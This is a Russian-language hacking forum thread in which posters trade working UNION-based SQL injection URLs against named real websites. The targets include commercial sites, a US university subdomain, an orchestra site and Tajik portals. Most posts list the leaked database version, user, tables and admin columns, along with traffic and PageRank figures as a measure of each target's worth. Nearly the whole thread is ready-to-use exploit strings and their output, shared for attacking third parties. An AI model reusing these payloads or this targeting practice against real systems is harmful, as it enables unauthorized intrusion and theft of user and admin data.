SQL Инъекции

Трафф 3-4 К

Code:

http://www.auto-creditline.ru/sell_cat.php?cid=-1%27+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,6,7,8,9+--+

autocre3_site@localhost:autocre3_credit:5.0.92-log
Таблицы

PHP:

cr_vinfax    
cr_users    
cr_tariffs    
cr_special    
cr_sms_oss    
cr_sms    
cr_review_galery    
cr_review_comment_galery    
cr_review_comment    
cr_review    
cr_partners    
cr_options    
cr_news    
cr_newcarmake    
cr_newcardealer_model    
cr_newcardealer_make    
cr_newcardealer    
cr_newcar_model    
cr_kasko    
cr_galery    
cr_faq    
cr_content    
cr_color    
cr_cities    
cr_category    
cr_cars    
cr_banner2    
cr_banner

Содержимое cr_users

PHP:

login
pwd
master
userid
session

P.S: Доступ в админку получите, но там будет облом

 

Давно меня тут не было

Code:

http://www.dog-perm.ru/modules.php?name=pitomnik&pag=&num_page=1&region_id=48&poroda_num=0&order=union+select+1,concat_ws%28user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--

User:[email protected]
Version:4.1.22
Database:dogpermru
ТИЦ 140

 

4.1.14:::tiranatimes:::ttimes@localhost

 

Зачем такие сложности? Там же не слепая скуля.

Code:

http://www.vmdaily.ru/showarticle.php?id=184843%27+and+1=3+union+select+1,table_name,3+FROM+information_schema.tables+--+

 

EDU =/

Поддомен универа Indiana
тИЦ 10, PR 6

Code:

http://www.math.indiana.[COLOR=Red]edu[/COLOR]/seminars/seminar.phtml?id=-1+union+all+select+database(),2,3,4,5,6,7--

P.S. Раньше были опубликованы скульи, но на другом поддомене...

 

Результат - редирект.
ScriptDungeon.com

Code:

http://www.scriptdungeon.com/jump.php?ScriptID=134+and+1=21+union+select+1,2,3,concat_ws(0x3b,version(),database(),user()),5,6,7,8,9,10,11,12+--+

Результат:

Code:

Перенаправление на:
http://www.scriptdungeon.com/5.1.42;scriptdungeon;dboscriptupdate@localhost

 

Code:

http://www.alienship.ru/index.php?type=ship&id=20
[email protected]
5.1.58-log
wwwalienshipru

хуnta

 

Alexa Rank 293,690 PR 4

Code:

http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--

icadm@localhost:db_chinaicnet_com:5.0.77

Code:

http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.tables

Code:

http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns

 

HackZona.ru
CY200 PR2


concat_ws(0x3b,version(),database(),user())
POST /hz.php?name=Search HTTP/1.1
Тело запроса:

Code:

query=s&topic=26' AND 1=2 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(0x3b,version(),database(),user()),8,9,10,11,12,13 # &category=0&author=123&days=7&type=stories

Code:

5.1.42;hz4647;hz4647@localhost

Запрос там кстати очень интересный:

Code:

select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, s.counter, a.url, s.comments, s.topic, s.score, s.ratings from voov_stories s, voov_authors a where s.aid=a.aid AND (s.title LIKE '%s%' OR s.hometext LIKE '%s%' OR s.bodytext LIKE '%s%' OR s.notes LIKE '%s%') AND s.informant='123' AND s.topic='26[SQL INJ]' AND TO_DAYS(NOW()) - TO_DAYS(time) <= '7' ORDER BY s.time DESC LIMIT 0,10

 

Лимит и вперёд

 

было =/
http://forum.antichat.ru/printthread.php?t=21336&page=6508&pp=1

 

Code:

http://www.enridan.com/place.php?id=8+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8--+

4.0.27-log:enridandb:enridan@localhost

 

The official site of the Armenian Philharmonic Orchestra
тиЦ 40 PR 5

Code:

http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,10--

apo_apo@localhost:apo_apo:5.0.92-community-log

Code:

http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,group_concat%28table_name%29,10+from+INFORMATION_SCHEMA.COLUMNS--

PHP:

admin
apo_news
artists
attachments
concerts
gallery
guest

Интересная таблица "admin"

Code:

http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws%28id,0x3a,email%29,10+FROM+admin--

http://www.apo.am/phpinfo.php - Это без комментариев

 

http://bgnevesta.com/hotornot/viewcomments.php?phid=0%20union%20select%201,username,3,password,5,6%20from%20admin--#

PR 3

 

Новосибирский Государственный Технический Университет

Code:

http://inform.nstu.ru/index.php?type=mir&stat=617
nginx/0.7.62
PHP/5.2.17 ZendServer/5.0
MySQL >=5
inform@localhost
5.0.77
inform@localhost
hosting.nstu.ru
Data Bases: 	information_schema
		inform
		test

 

http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42,53,54,55+from+information_schema.tables%20limit%2043,1--

 

PR 5 ТИЦ 100

http://www.bgiki.ru/news/more.php?id=-168+union+select+1,2,3,version()--

version =5.1.41-log=

 

За Русского и Эстонского пилота. Часть 1

Site: joblist.tj

Code:

http://www.[B]joblist.tj[/B]/showvacancy.php?id=[COLOR=Red]-[/COLOR]1478[B][COLOR=Red]+union+Select+1,concat_ws(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+[/COLOR][/B]

version: 5.0.91-community-log
database: develop_joblisttj
user: develop_ns@localhost

+ Уязвимый параметр:

Code:

/index.php?[COLOR=Red][B]catid[/B][/COLOR]=11'[B]SQL-Injection[/B]'

database found:

Code:

develop_aboutsa
develop_agromoldova
develop_apartments
develop_aport
develop_artishock
develop_blog
develop_bulgaria
develop_cbs
develop_cimul
develop_ctv
develop_decoretto
develop_developweb
develop_egypt
develop_elena
develop_joblisttj
develop_kitchen
develop_livetravelhelp
develop_moldovapiese
develop_mykupe
develop_nikitablog
develop_ritus
develop_rusnac
develop_rybak
develop_rybakforum
develop_turkey
develop_turkeys
develop_vesco
develop_worldofmoldova
[COLOR=Red][B]develop_za[/B] [/COLOR][I](Самая интересная)[/I]

Site: baza.kob.tj

Code:

http://baza.kob.tj/?a=orgtype&id=[B][COLOR=Red]-[/COLOR][/B]45[B][COLOR=Red]+union+select+concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,2,3+--+[/COLOR][/B]

version: 5.0.92-community
database: kobtj_db
user: kobtj_dbuser@localhost

Site: person.tj

Code:

http://www.person.tj/index.php?id=[COLOR=Red][B]-[/B][/COLOR]938[COLOR=Red][B]+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29+--+[/B][/COLOR]

version: 4.1.25
database: person
user: user@localhost

Site: dictionary.tj

Code:

http://dictionary.tj/finance/index.php?id=[COLOR=Red]-[/COLOR]1012[COLOR=Red][B]+union+select+1,concat_ws(0x3a,version(),database(),user())+--+[/B][/COLOR]

version: 4.1.25
database: base
user: user@localhost

 

4.0.30-max-log